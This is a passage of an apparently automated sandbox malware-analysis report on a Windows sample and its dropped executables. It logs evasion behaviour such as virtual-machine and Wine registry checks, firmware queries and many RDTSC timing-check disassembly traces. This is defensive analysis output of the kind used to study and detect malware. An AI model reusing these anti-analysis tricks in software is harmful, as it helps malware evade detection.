Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe System information queried: FirmwareTableInformation
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E29EB second address: 6E29FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a ja 00007F60A4BE8BD6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E29FB second address: 6E29FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E1EF3 second address: 6E1F0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4BE8BE4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E2057 second address: 6E205D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E205D second address: 6E208C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE2h 0x00000007 jmp 00007F60A4BE8BE5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E208C second address: 6E209B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F60A4E98EF6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E209B second address: 6E209F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E209F second address: 6E20A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E20A3 second address: 6E20A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E46E6 second address: 6E478E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F60A4E98EF6h 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jns 00007F60A4E98EF6h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push esi 0x00000019 jo 00007F60A4E98EF6h 0x0000001f pop esi 0x00000020 popad 0x00000021 nop 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007F60A4E98EF8h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 00000016h 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c mov dword ptr [ebp+122D30F5h], edx 0x00000042 push 00000000h 0x00000044 mov ch, F1h 0x00000046 mov ecx, dword ptr [ebp+122D2F0Ah] 0x0000004c call 00007F60A4E98EF9h 0x00000051 js 00007F60A4E98F0Dh 0x00000057 jmp 00007F60A4E98F07h 0x0000005c push eax 0x0000005d jmp 00007F60A4E98F06h 0x00000062 mov eax, dword ptr [esp+04h] 0x00000066 pushad 0x00000067 jmp 00007F60A4E98F03h 0x0000006c push esi 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E478E second address: 6E47A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F60A4BE8BDCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E47A4 second address: 6E4851 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jne 00007F60A4E98F02h 0x00000013 pop eax 0x00000014 call 00007F60A4E98F04h 0x00000019 sub ecx, 2C3C484Fh 0x0000001f pop edx 0x00000020 push 00000003h 0x00000022 mov ch, 66h 0x00000024 mov esi, 44FD3245h 0x00000029 push 00000000h 0x0000002b mov ecx, dword ptr [ebp+122D2C3Ah] 0x00000031 push 00000003h 0x00000033 sub dword ptr [ebp+122D3147h], edx 0x00000039 push 860DF276h 0x0000003e je 00007F60A4E98F02h 0x00000044 jne 00007F60A4E98EFCh 0x0000004a add dword ptr [esp], 39F20D8Ah 0x00000051 pushad 0x00000052 mov dword ptr [ebp+122D2FA0h], ebx 0x00000058 xor edx, dword ptr [ebp+122D2BE6h] 0x0000005e popad 0x0000005f lea ebx, dword ptr [ebp+124495C4h] 0x00000065 mov ecx, 0746D4DCh 0x0000006a mov edi, edx 0x0000006c xchg eax, ebx 0x0000006d push edx 0x0000006e jnl 00007F60A4E98EF8h 0x00000074 pop edx 0x00000075 push eax 0x00000076 push ecx 0x00000077 push eax 0x00000078 push edx 0x00000079 push ecx 0x0000007a pop ecx 0x0000007b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E4904 second address: 6E490E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F60A4BE8BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E490E second address: 6E4913 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E4913 second address: 6E4982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F60A4BE8BD6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor dword ptr [esp], 5F537EAFh 0x00000014 call 00007F60A4BE8BDCh 0x00000019 push edi 0x0000001a mov cl, CDh 0x0000001c pop edi 0x0000001d pop esi 0x0000001e mov edx, edi 0x00000020 push 00000003h 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007F60A4BE8BD8h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 00000015h 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c cmc 0x0000003d mov dword ptr [ebp+122D1C8Fh], ebx 0x00000043 push 00000000h 0x00000045 mov esi, 23334FEEh 0x0000004a push 00000003h 0x0000004c mov esi, dword ptr [ebp+122D2E2Eh] 0x00000052 call 00007F60A4BE8BD9h 0x00000057 push eax 0x00000058 push edx 0x00000059 jo 00007F60A4BE8BD8h 0x0000005f pushad 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E4982 second address: 6E49DB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F60A4E98EFEh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007F60A4E98F04h 0x00000017 mov eax, dword ptr [eax] 0x00000019 push ebx 0x0000001a pushad 0x0000001b push edx 0x0000001c pop edx 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a jmp 00007F60A4E98F06h 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E49DB second address: 6E49E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E4A79 second address: 6E4AA0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F60A4E98EFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F60A4E98F04h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E4AA0 second address: 6E4AF9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+122D2FCFh], eax 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F60A4BE8BD8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b jmp 00007F60A4BE8BE5h 0x00000030 push 940471D2h 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jnc 00007F60A4BE8BD6h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E4AF9 second address: 6E4B08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98EFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E4B08 second address: 6E4B7E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F60A4BE8BE1h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 6BFB8EAEh 0x00000012 jmp 00007F60A4BE8BE5h 0x00000017 push 00000003h 0x00000019 mov dword ptr [ebp+122D37E9h], eax 0x0000001f push 00000000h 0x00000021 mov dword ptr [ebp+122D3BBDh], ecx 0x00000027 push 00000003h 0x00000029 call 00007F60A4BE8BD9h 0x0000002e jnp 00007F60A4BE8BE0h 0x00000034 push eax 0x00000035 push eax 0x00000036 jmp 00007F60A4BE8BDCh 0x0000003b pop eax 0x0000003c mov eax, dword ptr [esp+04h] 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E4B7E second address: 6E4B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D4C5E second address: 6D4C76 instructions: 0x00000000 rdtsc 0x00000002 js 00007F60A4BE8BD8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jp 00007F60A4BE8BE2h 0x00000010 jnc 00007F60A4BE8BD6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 703BA4 second address: 703BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 703E91 second address: 703E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 703E99 second address: 703E9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 703E9D second address: 703EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D4C5A second address: 6D4C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 704016 second address: 70401A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70401A second address: 704020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 704020 second address: 704026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 704190 second address: 704198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 704198 second address: 70419C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7046F9 second address: 704703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F60A4E98EF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 704703 second address: 704712 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 704712 second address: 70471C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F60A4E98EF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7049B2 second address: 7049B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7049B6 second address: 7049EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4E98F04h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F60A4E98F09h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 704CDD second address: 704CE7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F60A4BE8BD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 704CE7 second address: 704CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 704CF1 second address: 704CF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 704CF5 second address: 704D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 jp 00007F60A4E98EF6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FC986 second address: 6FC98B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D82EC second address: 6D82FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4E98EFAh 0x00000009 pop edx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D82FE second address: 6D830C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F60A4BE8BD6h 0x0000000a pop edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D830C second address: 6D8312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D8312 second address: 6D8338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F60A4BE8BDEh 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 jnp 00007F60A4BE8BD6h 0x00000016 pop eax 0x00000017 push esi 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a pushad 0x0000001b popad 0x0000001c pop esi 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 704E22 second address: 704E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 704E28 second address: 704E38 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 je 00007F60A4BE8BD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7053E0 second address: 7053E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7053E6 second address: 7053EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70A6FE second address: 70A704 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70D29C second address: 70D2A6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F60A4BE8BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70D8A7 second address: 70D8B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F60A4E98EF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70D8B1 second address: 70D8B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
